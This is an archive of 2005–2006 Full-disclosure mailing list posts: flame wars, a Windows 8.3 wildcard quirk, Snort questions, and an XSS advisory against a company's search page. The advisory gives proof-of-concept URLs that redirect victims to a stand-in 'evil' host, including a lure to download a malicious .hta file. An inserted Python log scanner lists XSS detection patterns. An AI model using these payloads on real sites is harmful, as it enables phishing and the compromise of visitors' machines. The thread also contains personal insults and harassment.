Re: [Full-disclosure] IMLogic telling porkies about Yahoo

2005-10-14 Thread Native.Code
This n3td3v guy is such a troll and stupid person. Will someone pls block him from FD?

For God's sake! Why did these kids join this list?

-NC
On 10/14/05, James Tucker <[EMAIL PROTECTED]> wrote:
Sorry for the extremity of my blunt response, but I have two things to say:

1. How the fuck do YOU know any more than they do? Just because you obsess over the security factors around a company with which you have no affiliation does not put you in any greater authority to make statements like those you made there.

2. I have absolutely no interest in the topic of Yahoo! as a general view. Please keep your Yahoo orientated discussions on a Yahoo! lovers list or similar. I will contend statistics I read on my own, and decide my own level of trust. I certainly am not going to trust a random person with the name "n3td3v" to provide me more accurate statistics than a company devoted to the topic, as such, your statement of observation (which is completely unjustified in your blog entry, I might add) bears no relevance here. Moreover it can be best classed as a political attack, which is actively discouraged by the list charter.

Oh, and just FYI:
http://www.technewsworld.com/story/43364.html

Did you even check up on your own imagination before writing that, or does it just flow straight out the fingers?

-Yet another donation to the WWWaste.

On 10/14/05, n3td3v <[EMAIL PROTECTED]> wrote:
> http://n3td3v.blogspot.com/2005/10/imlogic-telling-porkies-about-yahoo.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] annoying bug in Windows XP

2005-10-16 Thread Native.Code
I won't say it is a bug. It is expected behavior in 8.3 filesystem. Anyone who has used Windows over a year knows this behavior.

On 10/16/05, Poof <[EMAIL PROTECTED]> wrote:
Yes, this occurs since you're just using the 8+3 filesystem with long filenames. If you'll notice:

File1.jav shows as just that. While File1.java shows as File1~1.jav

(It usually hides the non-LFN tree with default dir flags. I don't remember how to get it to show it all at this time.)

~

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Frank Dietrich
Sent: Sunday, October 16, 2005 1:25 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] annoying bug in Windows XP

Hi to all readers,

this day I found an annoying misbehavior in Windows XP professional with SP2.

I had a directory with some Java sources (*.java) and some backup files (*.jav). Because I didn't longer need the backup files I would delete them with 'del *.jav'. But this command also deleted all the source files. #§%*. The last backup was 4 hours ago. :-/

So I tried what happens and the result is the command above checks only the first three chars from the extension (DOS is alive).

Here is how you can reproduce it:

mkdir testbug
cd testbug
rem.>file1.jav
rem.>file2.java
rem.>file3.javas
del *.jav

All three files are deleted. Is this a known bug or an unknown feature?

Frank
--
21 is only half the truth
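Added example, not part of any message in this thread: a simplified Python model of the behaviour Poof describes, where a wildcard is tested against both the long name and its 8.3 alias, so `*.jav` also selects `file2.java` through `FILE2~1.JAV`. The alias generator is an assumption that covers only the common first-six-characters-plus-`~N` form; `short_alias`, `wildcard_matches`, `unexpected_deletions` and the file list are constructed for illustration.

```python
import fnmatch

# Constructed file list mirroring the reproduction steps in the thread.
FILES = ["file1.jav", "file2.java", "file3.javas", "notes.txt"]


def short_alias(long_name, taken):
    """Return a simplified 8.3 alias for long_name and record it in `taken`.

    Assumption: only the common "first six characters + ~N" form is modelled.
    Real Windows filters more characters and switches to a hashed stem after
    several collisions.
    """
    base, dot, ext = long_name.rpartition(".")
    if not dot:                                   # name without an extension
        base, ext = long_name, ""
    fits = (len(base) <= 8 and len(ext) <= 3
            and " " not in long_name and "." not in base)
    if fits:
        alias = long_name.upper()                 # already a legal 8.3 name
    else:
        stem = base.replace(" ", "").replace(".", "").upper()[:6]
        suffix = "." + ext.upper()[:3] if ext else ""
        n = 1
        while f"{stem}~{n}{suffix}" in taken:     # ~1, ~2, ... on collision
            n += 1
        alias = f"{stem}~{n}{suffix}"
    taken.add(alias)
    return alias


def wildcard_matches(pattern, long_names):
    """Map each selected file to 'long' or 'short-only (<alias>)'.

    A file is selected when the pattern matches either of its two names,
    which is why a three-character extension pattern reaches longer ones.
    """
    taken, hits = set(), {}
    pat = pattern.upper()
    for name in long_names:
        alias = short_alias(name, taken)
        if fnmatch.fnmatchcase(name.upper(), pat):
            hits[name] = "long"
        elif fnmatch.fnmatchcase(alias, pat):
            hits[name] = f"short-only ({alias})"
    return hits


def unexpected_deletions(pattern, long_names):
    """Files selected only through their alias, i.e. the surprising ones."""
    return [n for n, how in wildcard_matches(pattern, long_names).items()
            if how != "long"]


if __name__ == "__main__":
    for name, how in wildcard_matches("*.jav", FILES).items():
        print(f"{name:12} matched via {how}")
```

On a real volume, `dir /x` prints the short alias beside each long name, which shows what a wildcard will also reach before `del` is run.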

Re: [Full-disclosure] how to describe this tool ?

2005-11-01 Thread Native.Code
Depends on the use you put it to. I will call it an auditing tool.

On 11/2/05, news-letters <[EMAIL PROTECTED]> wrote:
Hi list,

I have a perl script I'd like to release (GPL), but I don't really know how to describe it.

To make it short here's a session on one (remote) machine. (but it's intended to be run on ip ranges with mostly windows hosts).

Starting script.pl ...
searching hosts in 192.168.0.100 ...
found 192.168.0.100   : BRAIN
starting information gathering on BRAIN
getting OS version ...
TCP port scanning ...
UDP port scanning ...
Getting process list ...
Getting services list ...
Getting drive list ...
Getting share list ...
Getting installed applications list ...
Creating naudit_report_192.168.0.100.html ... (printable)
Creating report for 192.168.0.100 ... (browsable)
done. Completed in 8.004 seconds

and attached is a sample (printable) report.

Is this an :
enumeration tool ?
auditing tool ?

Any idea ?

Have a nice day.

Simon


Re: [Full-disclosure] Re: new IE bug (confirmed on ALL windows)

2005-11-02 Thread Native.Code
Guys:
 
Being all of you IT genius, is there any way that I can't receive email from this thread but can from others? I don't want to use a filter or a moderated list.
 
Thanks. 
On 11/2/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
Nop here im sure sorry, for example someone reported in this thread to copy this content into an html file:
"http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
">
.supp IMG {
VERTICAL-ALIGN: middle
}
Crashes on xp, 2k it no more crashes, 98 it crashes 1/5 tries... but the one I posted , it crashes everytime loaded and everywhere I have mentioned + 98 included, and this Im 100% sure. This hole is very unreliable so follow MY instructions if you do want to test ...

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Dave Korn
Sent: Wednesday, 2 November 2005 15:18
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Re: new IE bug (confirmed on ALL windows)

> -Original Message-
> From: full-disclosure-bounces On Behalf Of Greg
> Sent: Tuesday, 1 November 2005 21:32

> - Original Message -
> From: <[EMAIL PROTECTED]>
> Sent: Wednesday, November 02, 2005 4:00 AM

>> I think I have found by chance this weekend a security bug, while
>> browsing the website news, within iexplorer on all windows versions.

> Sorry to be the "Negative Nark" here but yes, the crash works on
> IESP2 with XPSP2 but NO it does NOT crash WIN98SE with IESP2. The
> 98SE box was networked through ICS (wired to this XP box then wi-fi
> to a router) and has no firewall of its own. This XP box through
> which the 98SE box gets its internet is in the router's DMZ and uses
> only Zone Alarm Pro, just for clarity.

[EMAIL PROTECTED] wrote in news:[EMAIL PROTECTED]
> Again shut the fuck up , it also crashes on 98SE I have it here IDIOT.

[...ker-snip!...]

Guys?  Can I point out the obvious possibility that you both seem to have overlooked?

Rather than arguing about either "it does crash on 98" or "it doesn't crash on 98", and since you've *both* _actually_ tested it, AND GOTTEN DIFFERENT RESULTS, don't you think that you should both conclude that "It crashes on some 98 installs and not others", and therefore that the determining factor is not the OS version anyway, but something else that's different between your two setups?

It's a false assumption that it has to be all one or the other.

cheers,
DaveK
--
Can't think of a witty .sigline today

[Full-disclosure] Meeting Room Names

2005-11-09 Thread Native.Code
Something not related to vulnerabilities: you guys are requested to suggest names for our meeting rooms. We don't want to call them with sad names like Room A, Board Room etc. but something interesting.

 
We work in IT security area like you. A room with which name will you like to have your meeting in?

Re: [Full-disclosure] Meeting Room Names

2005-11-09 Thread Native.Code
Thanks all for cool ideas! I kind of like HTTP status codes and Microsoft product codenames. But still did not get any perfect choices. Please keep the choices coming!

 
How about names which sound in same rank of "Dungeon"? Feel free to use your non-IT creativity as well!
 
Thanks a lot again.
On 11/10/05, KF (lists) <[EMAIL PROTECTED]> wrote:
Or even better

letstalkaboutitofflist1 and takeittoyourprivateinbox2

-KF

Marlon Jabbur wrote:
>Call it Room 1, Room 10, Room 11, Room 100 and so on :-)
>
>On Wednesday 09 November 2005 08:08, Native.Code wrote:
>
>>We don't want to call them with sad names like
>>Room A, Board Room etc. but something interesting.


Re: [Full-disclosure] Meeting Room Names

2005-11-10 Thread Native.Code
My intention is really to get some cool ideas but seems like some people are not happy about it. Obviously I don't want to offend anyone but I hope that when people subscribe to any mailing list, they should understand that they may not like *everything* being posted to that list.

 
I don't like some stuff posted on this list too but I just delete those conversations instead of complaining.
 
Some of you have really given good ideas. I am ranking those and once we decide on Monday, will send a note of thanks. Till then if anyone of you have another idea, pls send it in :-)

 
Regards,
On 11/10/05, Jeanmougin, Mark <[EMAIL PROTECTED]> wrote:
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Native.Code
> Sent: Wednesday, November 09, 2005 23:35
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Meeting Room Names
>
> Thanks all for cool ideas! I kind of like HTTP status codes and
> Microsoft product codenames. But still did not get any perfect
> choices. Please keep the choices coming!
>
> How about names which sound in same rank of "Dungeon"? Feel free to
> use your non-IT creativity as well!
>
> Thanks a lot again.

Native.Code,

I know that you're getting some heat about having this discussion on list, but I'm really enjoying it.  So, please continue to copy me on any list ideas you're hearing.

Thanks!
MJ


Re: [Full-disclosure] Hackers Tomorrow

2005-11-15 Thread Native.Code
oh n3td3v!! I finally learned to spell your name. Am I in love with you?
On 11/15/05, Native.Code <[EMAIL PROTECTED]> wrote:
oh n3td3v!! I finally learned to spell your name. Am I in love with you?
On 11/15/05, n3td3v v3dt3n <[EMAIL PROTECTED]> wrote:

Hello kind fellow disclosers,

Since my last article gained so much praise i have written a second part on "hackers tomorrow". I have also heeded the criticism and have acquired my own domain so i look more cooler :) n3td3v.com of course. I have a new 1337 super secure mail addy [EMAIL PROTECTED] also. I love feedback :)

My article is at my new home http://www.n3td3v.com/hackerstomorrow.html

Enjoy!!

n3td3v

Re: [Full-disclosure] Window's O/S

2005-11-24 Thread Native.Code
Weird! haha :-) )
On 11/24/05, Stelian Ene <[EMAIL PROTECTED]> wrote:
jacob jango wrote:
> create a folder on desktop and name it as "notepad".
> open internet explorer > go to view > source code > this will open the
> contents of notepad folder!!

Even better: rename any exe to notepad.exe ;)

[Full-disclosure] Snort as IDS/IPS in mission-critical enterprise network

2005-12-08 Thread Native.Code
Hi security peers,
 
We are thinking to use Snort as IDS/IPS solution in our network where only port 80 and 443 are open to public internet. I would like to know how will you guys rate Snort compared to ISS RealSecure Network (http://www.iss.net/products_services/enterprise_protection/rsnetwork/sensor.php)? Is Snort enterprise ready where it can be deployed to monitor mission-critical network?

 
If any of you can name any big network which is using Snort as an example, it will be very helpful.
 
Thanks,
Native.Code

Re: [Full-disclosure] Snort as IDS/IPS in mission-critical enterprise network

2005-12-11 Thread Native.Code
Dear all,
 
Thanks for valuable input. It was very much appreciated. I kind of get the impression that Snort is very stable product but it needs a lot of effort configuring, monitoring and customizing. We will definitely give it a try. I assume I did not mention, we will be using Windows binary. Is this as stable as Linux version?

 
Some of you mentioned that many commercial productions are based on Snort. Can anyone name another product besides those from Sourcefire?

 
Thanks again,
Native.Code
On 12/10/05, Technica Forensis <[EMAIL PROTECTED]> wrote:
> what ever happened to FPGA/hardware based NIDS classifiers?  There
> seemed to be a number of papers and even some open source (open cores)
> code to do 10GigE with ease.
>
> still in the research labs?

http://www.cloudshield.com
and have your pocketbook ready, 'cause it ain't cheap.

Re: [Full-disclosure] N3td3v poll

2005-12-21 Thread Native.Code
Maybe n3td3v should change the ID and start anew? With a more mature approach to security?
 
I would do that if I was that much humiliated. Life is about learning lessons from your mistakes and not to make those again.
To start with, rename your Geocities homepage to something more realistic than "GLOBAL INTERNET OPERATIONS"  
On 12/21/05, fok yo <[EMAIL PROTECTED]> wrote:

The skies are falling:
Famous security woe N3td3v found yet another critical internet vulnerability, this time in snappoll...
He managed voting 36 times (once for each alter-ego ?).
Is snappoll as flawed as diebold?

2005/12/21, GroundZero Security <[EMAIL PROTECTED]>:
where is your brain oh senseless one

In case you did not notice, n3td3v is a very sensitive lad. Pretty skilled too: he managed parsing 1000s of lines of html to discover evil xss in google.com. Patching the bug required changing the google groups design so fundamentally it took google engineers over a week to implement a stable patch.
Let's kneel and praise netdev for 53cur1n D4 Pl4n3t, no need to be jealous, he's simply the best, yeah!

We are the spammers, sending unsolicited mail, w3tf4rt's our king.

- Original Message -
From: "n3td3v" <[EMAIL PROTECTED]>
To:
Sent: Wednesday, December 21, 2005 12:45 AM
Subject: Re: [Full-disclosure] N3td3v poll

> Wheres your Google and Yahoo vulnerabilities "fdlister"? I await your
> reply, oh jealous one. ;-)

You're way too deep man

> http://n3td3v.blogspot.com
> http://geocities.com/n3td3v
> http://groups.google.com/group/n3td3v

bah, my sarcasm is sickening me somehow.

--

Stop internet pollution, bully n3td3v and the like!


Re: [Full-disclosure] N3td3v poll

2005-12-21 Thread Native.Code
Another n3td3v quote: "I really think if I or my people were"
On 12/21/05, n3td3v <[EMAIL PROTECTED]> wrote:
I really think if I or my people were to take the opportunity to study the code, there would a lot than 36 votes sitting on that file. No one has the spare resources to even care about hacking such a meaningless, child-like poll. Time to get back to what counts, and that's research into Google and Yahoo. I think if there was a case of vote rigging, however, it would be carried out by my opponents, who are more than willing to carry this anti-n3td3v propaganda way into 2006, to ruin my reputation, and to pollute the list with polls and quotes, seen already in this and past anti-n3td3v threads. Have a good new year, i'm sure you'll have no vulnerabilities to disclose, since you're someone who just hates on people who do disclose vulnerabilities to vendors and the security community.

On 12/21/05, fok yo <[EMAIL PROTECTED]> wrote:
> The skies are falling:
> Famous security woe N3td3v found yet another critical internet
> vulnerability, this time in snappoll...
> He managed voting 36 times (once for each alter-ego ?).
> Is snappoll as flawed as diebold?

Re: [Full-disclosure] N3td3v poll

2005-12-21 Thread Native.Code
From http://www.geocities.com/n3td3v/home/hire.html?200521
 
Some nice quotes here, and the real reason behind n3td3v's childhood (it's quick-dollars baby!)
 









Get n3td3v working for you
Written by n3td3v, November 2005

Are you hiring? I can offer the following, and more.

Research: Updates on IM and e-mail threats towards employees at your business
Knowledge: Threats posed by hackers with interests in your business
Security: Original ideas for protecting data information on your business
Development: Secure solutions for software on your business
Prevention: Prevention of known planned attacks on your business
Alerts: Get regular updates on the threat level on your business

You know what to do, so do it...
Hire someone with real knowledge on your business and bring back that peace of mind you don't have right now.
 
 
 
 
On 12/21/05, n3td3v <[EMAIL PROTECTED]> wrote:
I really think if I or my people were to take the opportunity to study the code, there would a lot than 36 votes sitting on that file. No one has the spare resources to even care about hacking such a meaningless, child-like poll. Time to get back to what counts, and that's research into Google and Yahoo. I think if there was a case of vote rigging, however, it would be carried out by my opponents, who are more than willing to carry this anti-n3td3v propaganda way into 2006, to ruin my reputation, and to pollute the list with polls and quotes, seen already in this and past anti-n3td3v threads. Have a good new year, i'm sure you'll have no vulnerabilities to disclose, since you're someone who just hates on people who do disclose vulnerabilities to vendors and the security community.

On 12/21/05, fok yo <[EMAIL PROTECTED]> wrote:
> The skies are falling:
> Famous security woe N3td3v found yet another critical internet
> vulnerability, this time in snappoll...
> He managed voting 36 times (once for each alter-ego ?).
> Is snappoll as flawed as diebold?

Re: [Full-disclosure] MBT Xss vulnerability

2006-01-19 Thread Native.Code
What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT?
 
Your post is yet another proof that FD is more and more inhibited by script kiddies. Get a life!
On 1/19/06, MuNNa <[EMAIL PROTECTED]> wrote:
Hii List;

Recently, i found an Xss vulnerability in MBT web site. MBT offers services from Consulting to Managed Services. It is the Corporate member of The International Systems Security Engineering Association (ISSEA). BS 7799 (Information Security Management Framework) certified organization

Vulnerability: MBT XSS (Cross Site Scripting) Attacks
Criticality: Medium

Description:
MBT ( http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients, protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future. However it suffers Xss vulnerability on its own web page.

Below is the proof-of-concept which explains this -
http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]

Re-directing the site to any malicious or fake site to trap the victim :
http://www.mahindrabt.com/jse/jsp/search.jsp?q= document.location='http://www.[evil.site].com'

Though it does not affect server side a lot and may seem harmless, but it can be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant.

Vendor notification:
Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond.

Regards;
Santosh J.

Re: [Full-disclosure] MBT Xss vulnerability

2006-01-22 Thread Native.Code
Nice discussion guys. Perhaps I should have mentioned that XSS about every site should not be posted to FD. And MBT does *not* attract millions of job-seekers. It is an Indian employer and IT job-seekers in India, at any given time, should not be more than one million.

 
I believe most of subscribers on this list did not have to know this XSS. It should have been better reported to IT team at MBT.
 
Best. 
On 1/21/06, MuNNa <[EMAIL PROTECTED]> wrote:
Hii Bro,

I got the point. You meant to say that Xss for each and every site should not be posted here, unless n until it attracts heavy traffic like Yahoo etc. I agree to this that MBT doesn't attract that amount of traffic normally but you can target millions of users at one go.

Like say...there are many groups that post new job vacancies everyday. So if i create a url with javascript allowing you to download a file with say .hta extension and it claims itself to be some form that has to be filled by victim in order to apply for job.

For eg. http://www.mahindrabt.com/jse/jsp/search.jsp?q=document.location='www.evil.com/applicationform.hta'

If you post this URL in any of the above groups, you can be sure that your file will be downloaded by thousands of users. This is because MBT is one of the top employers. Believe me.

Before some one downloads such files and gets his machine compromised, i just wanted to warn the users. As number of victims could be large enough to create havoc, MBT's Xss vuln was of great concern to me.

This is what made me post this vuln over here. May be i might have posted it in the wrong list. If this is the case, i am sorry to cause annoyance to you and others.

Regards;
Santosh J.
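Added example, not part of either post in this thread: a defender-side check, in Python, that scans web access-log lines for requests to the search page whose `q` value carries the payload shapes the posts describe (script markup, a `document.location` redirect, an `.hta` link), including percent-encoded and double-encoded forms. The log lines, the indicator list and the function names are constructed for illustration; only the path and parameter name come from the thread.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SEARCH_PATH = "/jse/jsp/search.jsp"      # endpoint named in the thread
PARAM = "q"                              # parameter named in the thread

# Assumed, non-exhaustive rule set based on the payloads the posts describe.
INDICATORS = [
    ("script-tag", re.compile(r"<\s*script", re.I)),
    ("location-redirect", re.compile(r"document\s*\.\s*location", re.I)),
    ("hta-download", re.compile(r"\.hta\b", re.I)),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges, example.invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jan/2006:10:01:00 +0000] '
    '"GET /jse/jsp/search.jsp?q=java+developer HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Jan/2006:10:02:11 +0000] '
    '"GET /jse/jsp/search.jsp?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F'
    'example.invalid%2Fapplicationform.hta%27%3C%2Fscript%3E HTTP/1.1" 200 4890',
    '198.51.100.7 - - [19/Jan/2006:10:02:40 +0000] '
    '"GET /jse/jsp/search.jsp?q=%253Cscript%253Ex%253C%252Fscript%253E HTTP/1.1" 200 4801',
    '192.0.2.44 - - [19/Jan/2006:10:03:05 +0000] '
    '"GET /website/index.htm?q=%3Cscript%3E HTTP/1.1" 200 9000',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded payloads are visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_line(line):
    """Return the sorted indicator names found in the q parameter of one line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path != SEARCH_PATH:          # only the search endpoint is in scope
        return []
    hits = set()
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        text = fully_decode(value)       # parse_qs has already decoded once
        hits.update(name for name, rx in INDICATORS if rx.search(text))
    return sorted(hits)


def scan(lines):
    """Return (line_number, indicators) for every suspicious request."""
    results = []
    for number, line in enumerate(lines, start=1):
        hits = flag_line(line)
        if hits:
            results.append((number, hits))
    return results


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```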